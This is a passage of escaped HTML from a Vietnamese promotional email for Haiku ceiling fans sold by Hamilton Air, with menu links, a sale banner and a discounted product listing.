TH\\u00caM<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678768028416-haiku-bg_optimized.png\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_menu_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 10px 20px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"menu\\\" style=\\\"text-align:center\\\">\\r\\n<!--[if (mso)|(IE)]><table role=\\\"presentation\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" align=\\\"center\\\"><tr><![endif]-->\\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_self\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      HOME\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/giam-gia\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      \\u0110ANG SALE OFF\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-canh-go\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      QU\\u1ea0T TR\\u1ea6N C\\u00c1NH G\\u1ed6\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 22px;display:inline-block;color:#ffffff;font-family:arial,helvetica,sans-serif;font-size:14px;\\\" class=\\\"v-padding hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 22px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-cong-nghiep\\\" target=\\\"_blank\\\" style=\\\"padding:5px 22px;display:inline-block;color:#0068A5;font-family:arial,helvetica,sans-serif;font-size:14px;text-decoration:none\\\"  class=\\\"v-padding v-layout-display\\\">\\r\\n      QU\\u1ea0T TR\\u1ea6N HVLS\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n<!--[if (mso)|(IE)]><\\/tr><\\/table><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #111416\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #111416;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #111416;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #111416;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"192\\\" style=\\\"width: 192px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-32\\\" style=\\\"max-width: 320px;min-width: 192px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_4\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>S\\u1eec D\\u1ee4NG N\\u0102NG L\\u01af\\u1ee2NG HI\\u1ec6U QU\\u1ea2<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/haiku.hogiaphat.vn\\/#p=1\\\" style=\\\"height:54px; v-text-anchor:middle; width:172px;\\\" arcsize=\\\"7.5%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#3AAEE0\\\"><w:anchorlock\\/><center style=\\\"color:#FFFFFF;font-family:\'Rubik\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/haiku.hogiaphat.vn\\/#p=1\\\" target=\\\"_blank\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Rubik\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #FFFFFF; background-color: #3AAEE0; border-radius: 4px;-webkit-border-radius: 4px; -moz-border-radius: 4px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span class=\\\"v-padding\\\" style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><span style=\\\"line-height: 16.8px;\\\">E-CATALOGUE HAIKU FANS<\\/span><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"408\\\" style=\\\"width: 408px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-68\\\" style=\\\"max-width: 320px;min-width: 408px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table id=\\\"u_content_text_deprecated_8\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px 30px 40px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #ced4d9; line-height: 160%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 160%;\\\">V\\u1edbi kh\\u00f4ng gian Nh\\u00e0 \\u1ede n\\u01a1i c\\u00f3 con ng\\u01b0\\u1eddi sinh ho\\u1ea1t h\\u00e0ng n\\u00e0y. Qu\\u1ea1t tr\\u1ea7n nh\\u00e0 \\u1edf d\\u00e2n d\\u1ee5ng s\\u1ebd gi\\u00fap tho\\u1ea3i m\\u00e1i kh\\u00f4ng gian th\\u00f4ng tho\\u00e1ng c\\u1ea3 ng\\u00e0y. Th\\u00eam m\\u1ed9t c\\u1ea3m bi\\u1ebfn chuy\\u1ec3n \\u0111\\u1ed9ng t\\u00edch h\\u1ee3p s\\u1ebd b\\u1eadt\\/t\\u1eaft qu\\u1ea1t b\\u00e1n t\\u1ef1 \\u0111\\u1ed9ng, trong khi c\\u00e1c c\\u1ea3m bi\\u1ebfn m\\u00f4i tr\\u01b0\\u1eddng li\\u00ean t\\u1ee5c theo d\\u00f5i t\\u00ecnh tr\\u1ea1ng ph\\u00f2ng c\\u1ee7a b\\u1ea1n. Ch\\u1ec9 c\\u1ea7n \\u0111\\u1eb7t t\\u00f9y ch\\u1ecdn \\u0111\\u1ec3 t\\u1ef1 \\u0111\\u1ed9ng qu\\u1ea3n l\\u00fd lu\\u1ed3ng kh\\u00f4ng kh\\u00ed v\\u00e0 \\u00e1nh s\\u00e1ng LED c\\u1ea7n thi\\u1ebft \\u0111\\u1ec3 gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i b\\u1ea5t c\\u1ee9 l\\u00fac n\\u00e0o.<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 18px; line-height: 25.2px;\\\"><strong><span style=\\\"line-height: 25.2px; font-size: 18px;\\\">SALE OFF<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #383a3c; line-height: 120%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><span style=\\\"font-size: 38px; line-height: 45.6px;\\\"><strong><span style=\\\"line-height: 45.6px; font-family: \'Open Sans\', sans-serif; font-size: 38px;\\\">CH\\u01af\\u01a0NG TR\\u00ccNH GI\\u1ea2M GI\\u00c1 T3<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 0px 30px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px;\\\"><strong><span style=\\\"line-height: 28px; font-size: 20px;\\\"><span style=\\\"color: #db1908; line-height: 28px; font-size: 20px;\\\">GI\\u00c1 T\\u1ed0T NH\\u1ea4T<\\/span> T\\u1eea HAMILTON AIR<\\/span><\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #f5f5f5\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #f5f5f5;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"300\\\" style=\\\"width: 300px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-50\\\" style=\\\"max-width: 320px;min-width: 300px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"left\\\">\\r\\n      \\r\\n      <img align=\\\"left\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678763735498-L-caramel-wh.jpg\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 280px;\\\" width=\\\"280\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_1\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #db1908; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><strong>HAIKU L SERIES<\\/strong><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_13\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #111416; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-size: 24px; line-height: 33.6px;\\\"><strong>CARAMEL WHITE 52\\\"<\\/strong><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table id=\\\"u_content_text_deprecated_5\\\" style=\\\"font-family:\'Rubik\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Rubik\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"color: #858586; line-height: 120%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 120%;\\\"><strong><span style=\\\"text-decoration: line-through; font-size: 18px; line-height: 21.6px;\\\"><span style=\\\"line-height: 21.6px; font-size: 18px;\\\">23.8 <span style=\\\"font-size: 12px; line-height: 14.4px;\\\"><sup>Tri\\u1ec7u VN\\u0110<\\/sup><\\/span><\\/span><\\/span><\\/strong><span 